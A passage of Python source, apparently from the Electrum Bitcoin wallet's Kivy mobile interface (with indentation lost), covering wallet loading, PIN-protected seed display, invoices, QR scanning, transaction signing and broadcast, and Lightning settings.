with blockchain.blockchains_lock: blockchain_items = list(blockchain.blockchains.items())
for chain_id, b in blockchain_items:
if name == b.get_name():
self.network.run_from_another_thread(self.network.follow_chain_given_id(chain_id))
chain_objects = [blockchain.blockchains.get(chain_id) for chain_id in chains]
chain_objects = filter(lambda b: b is not None, chain_objects)
names = [b.get_name() for b in chain_objects]
if len(names) > 1:
cur_chain = self.network.blockchain().get_name()
ChoiceDialog(_('Choose your chain'), names, cur_chain, cb).open()
use_rbf = BooleanProperty(False)
def on_use_rbf(self, instance, x):
self.electrum_config.set_key('use_rbf', self.use_rbf, True)
android_backups = BooleanProperty(False)
def on_android_backups(self, instance, x):
self.electrum_config.set_key('android_backups', self.android_backups, True)
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
if self.wallet:
self.wallet.use_change = self.use_change
self.wallet.db.put('use_change', self.use_change)
self.wallet.save_db()
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def set_URI(self, uri):
self.switch_to('send')
self.send_screen.set_URI(uri)
def set_ln_invoice(self, invoice):
self.switch_to('send')
self.send_screen.set_ln_invoice(invoice)
def on_new_intent(self, intent):
data = intent.getDataString()
if intent.getScheme() == 'bitcoin':
self.set_URI(data)
elif intent.getScheme() == 'lightning':
self.set_ln_invoice(data)
def on_language(self, instance, language):
Logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
Logger.info("on_quotes")
self._trigger_update_status()
self._trigger_update_history()
def on_history(self, d):
Logger.info("on_history")
if self.wallet:
self.wallet.clear_coin_price_cache()
self._trigger_update_history()
def on_fee_histogram(self, *args):
self._trigger_update_history()
def on_request_status(self, event, key, status):
if key not in self.wallet.receive_requests:
return
self.update_tab('receive')
if self.request_popup and self.request_popup.key == key:
self.request_popup.update_status()
if status == PR_PAID:
self.show_info(_('Payment Received') + '\n' + key)
self._trigger_update_history()
def on_invoice_status(self, event, key):
req = self.wallet.get_invoice(key)
if req is None:
return
status = req['status']
# todo: update single item
self.update_tab('send')
if self.invoice_popup and self.invoice_popup.key == key:
self.invoice_popup.update_status()
if status == PR_PAID:
self.show_info(_('Payment was sent'))
self._trigger_update_history()
elif status == PR_FAILED:
self.show_info(_('Payment failed'))
def _get_bu(self):
decimal_point = self.electrum_config.get('decimal_point', DECIMAL_POINT_DEFAULT)
try:
return decimal_point_to_base_unit_name(decimal_point)
except UnknownBaseUnit:
return decimal_point_to_base_unit_name(DECIMAL_POINT_DEFAULT)
def _set_bu(self, value):
assert value in base_units.keys()
decimal_point = base_unit_name_to_decimal_point(value)
self.electrum_config.set_key('decimal_point', decimal_point, True)
self._trigger_update_status()
self._trigger_update_history()
wallet_name = StringProperty(_('No Wallet'))
base_unit = AliasProperty(_get_bu, _set_bu)
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return base_units[self.base_unit]
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
if not self.fx.is_enabled():
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, self.decimal_point())
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
'''Tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`orientation` is a read only `AliasProperty` Defaults to 'landscape'
'''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
'''Defines tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`ui_mode` is a read only `AliasProperty` Defaults to 'phone'
'''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None # type: Optional[Abstract_Wallet]
self.pause_time = 0
self.asyncio_loop = asyncio.get_event_loop()
self.password = None
App.__init__(self)#, **kwargs)
self.electrum_config = config = kwargs.get('config', None) # type: SimpleConfig
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None) # type: Network
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
net_params = self.network.get_parameters()
self.server_host = net_params.host
self.server_port = net_params.port
self.auto_connect = net_params.auto_connect
self.oneserver = net_params.oneserver
self.proxy_config = net_params.proxy if net_params.proxy else {}
self.update_proxy_str(self.proxy_config)
self.plugins = kwargs.get('plugins', None) # type: Plugins
self.gui_object = kwargs.get('gui_object', None) # type: ElectrumGui
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_rbf = config.get('use_rbf', True)
self.use_unconfirmed = not config.get('confirmed_only', False)
# create triggers so as to minimize updating a max of 2 times a sec
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
self._periodic_update_status_during_sync = Clock.schedule_interval(self.update_wallet_synchronizing_progress, .5)
# cached dialogs
self._settings_dialog = None
self._password_dialog = None
self._channels_dialog = None
self._addresses_dialog = None
self.fee_status = self.electrum_config.get_fee_status()
self.invoice_popup = None
self.request_popup = None
def on_pr(self, pr: 'PaymentRequest'):
if not self.wallet:
self.show_error(_('No wallet loaded.'))
return
if pr.verify(self.wallet.contacts):
key = pr.get_id()
invoice = self.wallet.get_invoice(key) # FIXME wrong key...
if invoice and invoice['status'] == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
elif pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from electrum.bitcoin import is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.startswith('bitcoin:'):
self.set_URI(data)
return
bolt11_invoice = maybe_extract_bolt11_invoice(data)
if bolt11_invoice is not None:
self.set_ln_invoice(bolt11_invoice)
return
# try to decode transaction
from electrum.transaction import tx_from_any
try:
tx = tx_from_any(data)
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for tab in ['invoices', 'send', 'history', 'receive', 'address']:
self.update_tab(tab)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
if s is None:
s = self.tabs.ids[name + '_screen']
s.load_screen()
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, is_lightning, key):
from .uix.dialogs.request_dialog import RequestDialog
request = self.wallet.get_request(key)
data = request['invoice'] if is_lightning else request['URI']
self.request_popup = RequestDialog('Request', data, key, is_lightning=is_lightning)
self.request_popup.open()
def show_invoice(self, is_lightning, key):
from .uix.dialogs.invoice_dialog import InvoiceDialog
invoice = self.wallet.get_invoice(key)
if not invoice:
return
data = invoice['invoice'] if is_lightning else key
self.invoice_popup = InvoiceDialog('Invoice', data, key)
self.invoice_popup.open()
def qr_dialog(self, title, data, show_text=False, text_for_clipboard=None):
from .uix.dialogs.qr_dialog import QRDialog
def on_qr_failure():
popup.dismiss()
msg = _('Failed to display QR code.')
if text_for_clipboard:
msg += '\n' + _('Text copied to clipboard.')
self._clipboard.copy(text_for_clipboard)
Clock.schedule_once(lambda dt: self.show_info(msg))
popup = QRDialog(title, data, show_text, failure_cb=on_qr_failure,
text_for_clipboard=text_for_clipboard)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.electrum.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
try:
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
except Exception as e: # exc would otherwise get lost
send_exception_to_crash_reporter(e)
finally:
activity.unbind(on_activity_result=on_qr_result)
activity.bind(on_activity_result=on_qr_result)
PythonActivity.mActivity.startActivityForResult(intent, 0)
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file('electrum/gui/kivy/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def handle_crash_on_startup(func):
def wrapper(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
except Exception as e:
from .uix.dialogs.crash_reporter import CrashReporter
# show the crash reporter, and when it's closed, shutdown the app
cr = CrashReporter(self, exctype=type(e), value=e, tb=e.__traceback__)
cr.on_dismiss = lambda: self.stop()
Clock.schedule_once(lambda _, cr=cr: cr.open(), 0)
return wrapper
@handle_crash_on_startup
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
Logger.info('Time to on_start: {} <<<<<<<<'.format(time.process_time()))
Window.bind(size=self.on_size, on_keyboard=self.on_keyboard)
Window.bind(on_key_down=self.on_key_down)
#Window.softinput_mode = 'below_target'
self.on_size(Window, Window.size)
self.init_ui()
crash_reporter.ExceptionHook(self)
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for bitcoin: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'status', 'new_transaction', 'verified']
self.network.register_callback(self.on_network_event, interests)
self.network.register_callback(self.on_fee, ['fee'])
self.network.register_callback(self.on_fee_histogram, ['fee_histogram'])
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
self.network.register_callback(self.on_channels, ['channels_updated'])
self.network.register_callback(self.on_channel, ['channel'])
self.network.register_callback(self.on_invoice_status, ['invoice_status'])
self.network.register_callback(self.on_request_status, ['request_status'])
self.network.register_callback(self.on_channel_db, ['channel_db'])
self.network.register_callback(self.set_num_peers, ['gossip_peers'])
self.network.register_callback(self.set_unknown_channels, ['unknown_channels'])
# load wallet
self.load_wallet_by_name(self.electrum_config.get_wallet_path(use_gui_last_wallet=True))
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def on_channel_db(self, event, num_nodes, num_channels, num_policies):
self.lightning_gossip_num_nodes = num_nodes
self.lightning_gossip_num_channels = num_channels
def set_num_peers(self, event, num_peers):
self.lightning_gossip_num_peers = num_peers
def set_unknown_channels(self, event, unknown):
self.lightning_gossip_num_queries = unknown
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_complete(self, wizard, storage, db):
if storage:
wallet = Wallet(db, storage, config=self.electrum_config)
wallet.start_network(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
elif not self.wallet:
# wizard did not return a wallet; and there is no wallet open atm
# try to open last saved wallet (potentially start wizard again)
self.load_wallet_by_name(self.electrum_config.get_wallet_path(use_gui_last_wallet=True),
ask_if_wizard=True)
def _on_decrypted_storage(self, storage: WalletStorage):
assert storage.is_past_initial_decryption()
db = WalletDB(storage.read(), manual_upgrades=False)
if db.requires_upgrade():
wizard = Factory.InstallWizard(self.electrum_config, self.plugins)
wizard.path = storage.path
wizard.bind(on_wizard_complete=self.on_wizard_complete)
wizard.upgrade_storage(storage, db)
else:
self.on_wizard_complete(None, storage, db)
def load_wallet_by_name(self, path, ask_if_wizard=False):
if not path:
return
if self.wallet and self.wallet.storage.path == path:
return
wallet = self.daemon.load_wallet(path, None)
if wallet:
if wallet.has_password():
def on_success(x):
# save pin_code so that we can create backups
self.password = x
self.load_wallet(wallet)
self.password_dialog(
check_password=wallet.check_password,
on_success=on_success,
on_failure=self.stop)
else:
self.load_wallet(wallet)
else:
def launch_wizard():
storage = WalletStorage(path)
if not storage.file_exists():
wizard = Factory.InstallWizard(self.electrum_config, self.plugins)
wizard.path = path
wizard.bind(on_wizard_complete=self.on_wizard_complete)
wizard.run('new')
else:
if storage.is_encrypted():
if not storage.is_encrypted_with_user_pw():
raise Exception("Kivy GUI does not support this type of encrypted wallet files.")
def on_password(pw):
self.password = pw
storage.decrypt(pw)
self._on_decrypted_storage(storage)
self.password_dialog(
check_password=storage.check_password,
on_success=on_password,
on_failure=self.stop)
return
self._on_decrypted_storage(storage)
if not ask_if_wizard:
launch_wizard()
else:
def handle_answer(b: bool):
if b:
launch_wizard()
else:
try: os.unlink(path)
except FileNotFoundError: pass
self.stop()
d = Question(_('Do you want to launch the wizard again?'), handle_answer)
d.open()
def on_stop(self):
Logger.info('on_stop')
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_key_down(self, instance, key, keycode, codepoint, modifiers):
if 'ctrl' in modifiers:
# q=24 w=25
if keycode in (24, 25):
self.stop()
elif keycode == 27:
# r=27
# force update wallet
self.update_wallet()
elif keycode == 112:
# pageup
#TODO move to next tab
pass
elif keycode == 117:
# pagedown
#TODO move to prev tab
pass
#TODO: alt+tab_number to activate the particular tab
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
def lightning_open_channel_dialog(self):
d = LightningOpenChannelDialog(self)
d.open()
def lightning_channels_dialog(self):
if not self.wallet.has_lightning():
self.show_error('Lightning not enabled on this wallet')
return
if self._channels_dialog is None:
self._channels_dialog = LightningChannelsDialog(self)
self._channels_dialog.open()
def on_channel(self, evt, chan):
if self._channels_dialog:
Clock.schedule_once(lambda dt: self._channels_dialog.update())
def on_channels(self, evt, wallet):
if self._channels_dialog:
Clock.schedule_once(lambda dt: self._channels_dialog.update())
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
from .uix.dialogs.wallets import WalletDialog
d = WalletDialog()
d.open()
elif name == 'status':
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/'+name+'.kv')
master_public_keys_layout = popup.ids.master_public_keys
for xpub in self.wallet.get_master_public_keys()[1:]:
master_public_keys_layout.add_widget(TopLabel(text=_('Master Public Key')))
ref = RefLabel()
ref.name = _('Master Public Key')
ref.data = xpub
master_public_keys_layout.add_widget(ref)
popup.open()
elif name.endswith("_dialog"):
getattr(self, name)()
else:
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/'+name+'.kv')
popup.open()
@profiler
def init_ui(self):
''' Initialize The Ux part of electrum. This function performs the basic
tasks of setting up the ui.
'''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum.gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum.gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.contacts_screen = None
self.send_screen = None
self.invoices_screen = None
self.receive_screen = None
self.requests_screen = None
self.address_screen = None
self.icon = "electrum/gui/icons/electrum.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
net_params = self.network.get_parameters()
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_forkpoint = chain.get_max_forkpoint()
self.blockchain_name = chain.get_name()
interface = self.network.interface
if interface:
self.server_host = interface.host
else:
self.server_host = str(net_params.host) + ' (connecting...)'
self.proxy_config = net_params.proxy or {}
self.update_proxy_str(self.proxy_config)
def on_network_event(self, event, *args):
Logger.info('network event: '+ event)
if event == 'network_updated':
self._trigger_update_interfaces()
self._trigger_update_status()
elif event == 'wallet_updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'blockchain_updated':
# to update number of confirmations in history
self._trigger_update_wallet()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet: 'Abstract_Wallet'):
if self.wallet:
self.stop_wallet()
self.wallet = wallet
self.wallet_name = wallet.basename()
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return
self.use_change = self.wallet.use_change
self.electrum_config.save_last_wallet(wallet)
def update_status(self, *dt):
if not self.wallet:
return
if self.network is None or not self.network.is_connected():
status = _("Offline")
elif self.network.is_connected():
self.num_blocks = self.network.get_local_height()
server_height = self.network.get_server_height()
server_lag = self.num_blocks - server_height
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
status = ("{} [size=18dp]({}/{})[/size]"
.format(_("Synchronizing..."), num_answered, num_sent))
elif server_lag > 1:
status = _("Server is lagging ({} blocks)").format(server_lag)
else:
status = ''
else:
status = _("Disconnected")
if status:
self.balance = status
self.fiat_balance = status
else:
c, u, x = self.wallet.get_balance()
l = int(self.wallet.lnworker.get_balance()) if self.wallet.lnworker else 0
text = self.format_amount(c + x + u + l)
self.balance = str(text.strip()) + ' [size=22dp]%s[/size]'% self.base_unit
self.fiat_balance = self.fx.format_amount(c+u+x) + ' [size=22dp]%s[/size]'% self.fx.ccy
def update_wallet_synchronizing_progress(self, *dt):
if not self.wallet:
return
if not self.wallet.up_to_date:
self._trigger_update_status()
def get_max_amount(self):
from electrum.transaction import PartialTxOutput
if run_hook('abort_send', self):
return ''
inputs = self.wallet.get_spendable_coins(None)
if not inputs:
return ''
addr = None
if self.send_screen:
addr = str(self.send_screen.screen.address)
if not addr:
addr = self.wallet.dummy_address()
outputs = [PartialTxOutput.from_address_and_value(addr, '!')]
try:
tx = self.wallet.make_unsigned_transaction(coins=inputs, outputs=outputs)
except NoDynamicFeeEstimates as e:
Clock.schedule_once(lambda dt, bound_e=e: self.show_error(str(bound_e)))
return ''
except NotEnoughFunds:
return ''
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return ''
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
return format_satoshis_plain(amount_after_all_fees, self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, 0, self.decimal_point(), is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, x):
return format_satoshis_plain(x, self.decimal_point()) + ' ' + self.base_unit
def format_fee_rate(self, fee_rate):
# fee_rate is in sat/kB
return format_fee_satoshis(fee_rate/1000) + ' sat/byte'
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Electrum', message,
app_icon=icon, app_name='Electrum')
except ImportError:
Logger.Error('Notification: needs plyer; `sudo python3 -m pip install plyer`')
def on_pause(self):
self.pause_time = time.time()
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
now = time.time()
if self.wallet and self.wallet.has_password() and now - self.pause_time > 5*60:
self.password_dialog(check_password=self.check_pin_code, on_success=None, on_failure=self.stop, is_password=False)
if self.nfcscanner:
self.nfcscanner.nfc_enable()
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label):
if not label.data:
return
self.qr_dialog(label.name, label.data, True)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon='atlas://electrum/gui/kivy/theming/light/error', duration=0,
modal=False):
''' Show an error Message Bubble.
'''
self.show_info_bubble( text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show an Info Message Bubble.
'''
self.show_error(error, icon='atlas://electrum/gui/kivy/theming/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show an Information Bubble
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = 'atlas://electrum/gui/kivy/theming/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def show_transaction(self, txid):
tx = self.wallet.db.get_transaction(txid)
if not tx and self.wallet.lnworker:
tx = self.wallet.lnworker.lnwatcher.db.get_transaction(txid)
if tx:
self.tx_dialog(tx)
else:
self.show_error(f'Transaction not found {txid}')
def lightning_tx_dialog(self, tx):
from .uix.dialogs.lightning_tx_dialog import LightningTxDialog
d = LightningTxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
status = False
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except BestEffortRequestFailed as e:
msg = repr(e)
else:
status, msg = True, tx.txid()
Clock.schedule_once(lambda dt: on_complete(status, msg))
def broadcast(self, tx):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
else:
msg = msg or ''
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
screen.amount = amount
popup = AmountDialog(show_max, amount, cb)
popup.open()
def addresses_dialog(self):
from .uix.dialogs.addresses import AddressesDialog
if self._addresses_dialog is None:
self._addresses_dialog = AddressesDialog(self)
self._addresses_dialog.update()
self._addresses_dialog.open()
def fee_dialog(self, label, dt):
from .uix.dialogs.fee_dialog import FeeDialog
def cb():
self.fee_status = self.electrum_config.get_fee_status()
fee_dialog = FeeDialog(self, self.electrum_config, cb)
fee_dialog.open()
def on_fee(self, event, *arg):
self.fee_status = self.electrum_config.get_fee_status()
def protected(self, msg, f, args):
if self.electrum_config.get('pin_code'):
on_success = lambda pw: f(*(args + (self.password,)))
self.password_dialog(
message = msg,
check_password=self.check_pin_code,
on_success=on_success,
on_failure=lambda: None,
is_password=False)
else:
f(*(args + (self.password,)))
def toggle_lightning(self):
if self.wallet.has_lightning():
if not bool(self.wallet.lnworker.channels):
warning = _('This will delete your lightning private keys')
d = Question(_('Disable Lightning?') + '\n\n' + warning, self._disable_lightning)
d.open()
else:
self.show_info('This wallet has channels')
else:
warning1 = _("Lightning support in Electrum is experimental. Do not put large amounts in lightning channels.")
warning2 = _("Funds stored in lightning channels are not recoverable from your seed. You must backup your wallet file everytime you create a new channel.")
d = Question(_('Enable Lightning?') + '\n\n' + warning1 + '\n\n' + warning2, self._enable_lightning)
d.open()
def _enable_lightning(self, b):
if not b:
return
wallet_path = self.get_wallet_path()
self.wallet.init_lightning()
self.show_info(_('Lightning keys have been initialized.'))
self.stop_wallet()
self.load_wallet_by_name(wallet_path)
def _disable_lightning(self, b):
if not b:
return
wallet_path = self.get_wallet_path()
self.wallet.remove_lightning()
self.show_info(_('Lightning keys have been removed.'))
self.stop_wallet()
self.load_wallet_by_name(wallet_path)
def delete_wallet(self):
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = self.wallet.basename()
self.protected(_("Enter your PIN code to confirm deletion of {}").format(basename), self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except:
self.show_error("Invalid PIN")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error(_("Wallet removed: {}").format(basename))
new_path = self.electrum_config.get_wallet_path(use_gui_last_wallet=True)
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Enter PIN code to display your seed"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
label.data = seed
if passphrase:
label.data += '\n\n' + _('Passphrase') + ': ' + passphrase
def has_pin_code(self):
return bool(self.electrum_config.get('pin_code'))
def check_pin_code(self, pin):
if pin != self.electrum_config.get('pin_code'):
raise InvalidPassword
def password_dialog(self, **kwargs):
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
self._password_dialog.init(self, **kwargs)
self._password_dialog.open()
def change_password(self, cb):
def on_success(old_password, new_password):
self.wallet.update_password(old_password, new_password)
self.password = new_password
self.show_info(_("Your password was updated"))
on_failure = lambda: self.show_error(_("Password not updated"))
self.password_dialog(
check_password = self.wallet.check_password,
on_success=on_success, on_failure=on_failure,
is_change=True, is_password=True,
has_password=self.wallet.has_password())
def change_pin_code(self, cb):
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
def on_success(old_password, new_password):
self.electrum_config.set_key('pin_code', new_password)
cb()
self.show_info(_("PIN updated") if new_password else _('PIN disabled'))
on_failure = lambda: self.show_error(_("PIN not updated"))
self._password_dialog.init(
self, check_password=self.check_pin_code,
on_success=on_success, on_failure=on_failure,
is_change=True, is_password=False,
has_password = self.has_pin_code())
self._password_dialog.open()
def save_backup(self):
if platform != 'android':
self._save_backup()
return
from android.permissions import request_permissions, Permission
def cb(permissions, grant_results: Sequence[bool]):
if not grant_results or not grant_results[0]:
